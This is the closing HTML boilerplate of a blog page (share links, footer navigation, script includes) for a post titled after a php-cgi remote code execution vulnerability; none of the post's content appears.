  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://q1ng-li.github.io/2026/04/13/blog36/&title=php-cgi (CVE-2012-1823 | CVE-2024-4577) 远程代码执行漏洞"><i class="fa fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://q1ng-li.github.io/2026/04/13/blog36/&title=php-cgi (CVE-2012-1823 | CVE-2024-4577) 远程代码执行漏洞"><i class="fa fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://q1ng-li.github.io/2026/04/13/blog36/&title=php-cgi (CVE-2012-1823 | CVE-2024-4577) 远程代码执行漏洞"><i class="fa fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://q1ng-li.github.io/2026/04/13/blog36/&title=php-cgi (CVE-2012-1823 | CVE-2024-4577) 远程代码执行漏洞"><i class="fa fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://q1ng-li.github.io/2026/04/13/blog36/&name=php-cgi (CVE-2012-1823 | CVE-2024-4577) 远程代码执行漏洞&description="><i class="fa fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
      <ul>
        <li id="toc"><a class="icon" href="#" onclick='$("#toc-footer").toggle();return false;'><i class="fa fa-list fa-lg" aria-hidden="true"></i> TOC</a></li>
        <li id="share"><a class="icon" href="#" onclick='$("#share-footer").toggle();return false;'><i class="fa fa-share-alt fa-lg" aria-hidden="true"></i> Share</a></li>
        <li id="top" style="display:none"><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a></li>
        <li id="menu"><a class="icon" href="#" onclick='$("#nav-footer").toggle();return false;'><i class="fa fa-bars fa-lg" aria-hidden="true"></i> Menu</a></li>
      </ul>
    </div>

  </div>
</div>

      
      <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2026 q1ng
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/home/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/tags">Tags</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a target="_blank" rel="noopener" href="http://github.com/tzvetkov75">Projects</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

      
<script src="/lib/justified-gallery/jquery.justifiedGallery.min.js"></script>


<script src="/js/main.js"></script>

<!-- Google Analytics -->

<!-- Disqus Comments -->


    </div>
</body>
</html>
